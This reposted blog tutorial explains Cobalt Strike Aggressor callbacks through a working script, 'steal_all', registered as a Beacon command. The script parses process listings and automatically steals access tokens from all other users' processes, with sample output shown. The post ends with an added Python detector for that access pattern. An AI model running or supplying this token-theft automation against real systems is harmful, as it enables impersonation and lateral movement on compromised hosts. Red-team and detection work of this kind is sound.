Cobalt Strike Aggressor Callbacks

The Cobalt Strike 4.9 release introduced support for registering Aggressor callbacks for several functions, including bexecute_assembly, bpowerpick, and binline_execute. Prior to this feature, there was no practical way of tasking Beacon and then performing further actions based on the output (other than reading it on the console and then manually issuing more commands). To demonstrate the usefulness of these new callbacks, let's consider a scenario involving the token store. Until now, we have had to either issue a ps command to list the processes running on a system and then type or copy/paste the PID of each one into the token-store command.

beacon> ps

PID     PPID    Name     Arch  Session  User
---     ----    ----     ----  -------  ----
179184  179028  cmd.exe  x64   2        DESKTOP-1U6AHIU\test_user
128392  181212  cmd.exe  x64   2        DESKTOP-1U6AHIU\test_user2

beacon> token-store steal 179184,128392 11
[*] Stored Tokens

 ID   PID   User
 --   ---   ----
 0    179184 DESKTOP-1U6AHIU\test_user
 1    128392 DESKTOP-1U6AHIU\test_user2

Or use the process explorer GUI to go through and highlight each process individually.


By utilising the callbacks, we can execute the bps function in Aggressor, parse the output and automatically pass the target PIDs to btoken_store_steal. A callback can be provided directly in the bps function, so instead of bps($1), it can be bps($1, &ps_cb). The callback function will receive the ID of the Beacon and the result of bps. Here, I just perform some regex on the output to extract the process name, PID, arch, and username. Each PID that matches my criteria is added to a list.

sub ps_cb { 
    # $1 = beacon ID
    # $2 = results

    local('$current_user @stolen @targets');

    # get our current username
    # but strip off the * when elevated
    $current_user = replace(binfo($1, "user"), '(\s.*)', "");

    # a list to hold the names
    # of users already stolen from
    @stolen = @();

    # a list of PIDs to steal from
    @targets = @();

    # loop over every process
    # [name] [ppid] [pid] [arch] [user] [session]
    while ($2 hasmatch '(.*.exe)\t[0-9]*\t([0-9]*)\t(x64|x86)\t(.*)\t\d')
    {
        local('$process $pid $arch $user');

        $process = matched()[0];
        $pid = matched()[1];
        $arch = matched()[2];
        $user = matched()[3];

        # if the process belongs to a different user
        if ($user !ismatch ".*\\ $+ $current_user $+ ")
        {
            # ignore system accounts
            if ($user ismatch 'NT(\s)AUTHORITY.*') {
                continue;
            }

            # ignore if already stolen from this user
            if ($user in @stolen) {
                continue;
            }

            ## log to the console
            blog2($1, "Adding  $+ $process $+  ( $+ $pid $+ | $+ $arch $+ ) to list of tokens to steal from");

            # add to lists
            push(@stolen, $user);
            push(@targets, $pid);
        }
    }

    # attempt to steal tokens and add to store
    btoken_store_steal($1, @targets, 11);
}

The call to bps can be registered as a new Beacon command.

alias steal_all {
    bps($1, &ps_cb);
}

beacon_command_register(
   "steal_all", 
   "Steal access tokens from all processes", 
   "Synopsis: steal_all\n\nSteal access tokens from all processes not owned by the current user.\nExcludes processes owned by NT AUTHORITY\\*");

Example usage:

beacon> steal_all
[*] Adding cmd.exe (179184|x64) to list of tokens to steal from
[*] Adding cmd.exe (128392|x64) to list of tokens to steal from
[*] Tasked beacon to steal token from PID(s) 179184,128392 with OpenProcessToken access mask 11

[*] Stored Tokens

 ID   PID   User
 --   ---   ----
 0    179184 DESKTOP-1U6AHIU\test_user
 1    128392 DESKTOP-1U6AHIU\test_user2
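
For defenders, the tasking above has a recognisable shape: one process touching processes owned by several different non-system users within seconds. The Python below is an added example, not code from the original post or from Cobalt Strike; the event tuples, their schema, the source PIDs and the thresholds are constructed assumptions standing in for whatever process-access telemetry you collect.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, normalized process-access events (assumed schema, not a real
# product's field names): time, source PID, target PID, target process owner.
SAMPLE_EVENTS = [
    ("2023-10-10T10:30:01", 4242, 179184, r"DESKTOP-1U6AHIU\test_user"),
    ("2023-10-10T10:30:01", 4242, 128392, r"DESKTOP-1U6AHIU\test_user2"),
    ("2023-10-10T10:30:02", 4242, 5120, r"DESKTOP-1U6AHIU\test_user2"),
    ("2023-10-10T10:31:40", 900, 179184, r"DESKTOP-1U6AHIU\test_user"),
    ("2023-10-10T10:45:00", 900, 128392, r"DESKTOP-1U6AHIU\test_user2"),
    ("2023-10-10T10:50:00", 700, 4, r"NT AUTHORITY\SYSTEM"),
]


def find_multi_user_access(events, window=timedelta(seconds=10), min_users=2):
    """Return {source_pid: sorted users} for sources that touched processes
    owned by >= min_users distinct non-system users within `window`."""
    by_source = defaultdict(list)
    for ts, src, _target, user in events:
        if user.upper().startswith("NT AUTHORITY\\"):
            continue  # the script on this page skips these accounts too
        by_source[src].append((datetime.fromisoformat(ts), user))

    alerts = {}
    for src, hits in by_source.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # shrink the window from the left until it spans <= `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            users = {u for _, u in hits[start:end + 1]}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break
    return alerts


if __name__ == "__main__":
    for pid, users in find_multi_user_access(SAMPLE_EVENTS).items():
        print(f"PID {pid} accessed processes of {len(users)} users: {users}")
```
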

This was a simple example of how these new callbacks can drive additional automation within Aggressor scripts. The Cobalt Strike team have also published several examples to GitHub, which you should check out for additional inspiration.

Originally published by Rasta Mouse: Cobalt Strike Aggressor Callbacks

Copyright notice: posted by admin on October 10, 2023 at 10:30 AM.
When reposting, please credit: Cobalt Strike Aggressor Callbacks | CTF导航
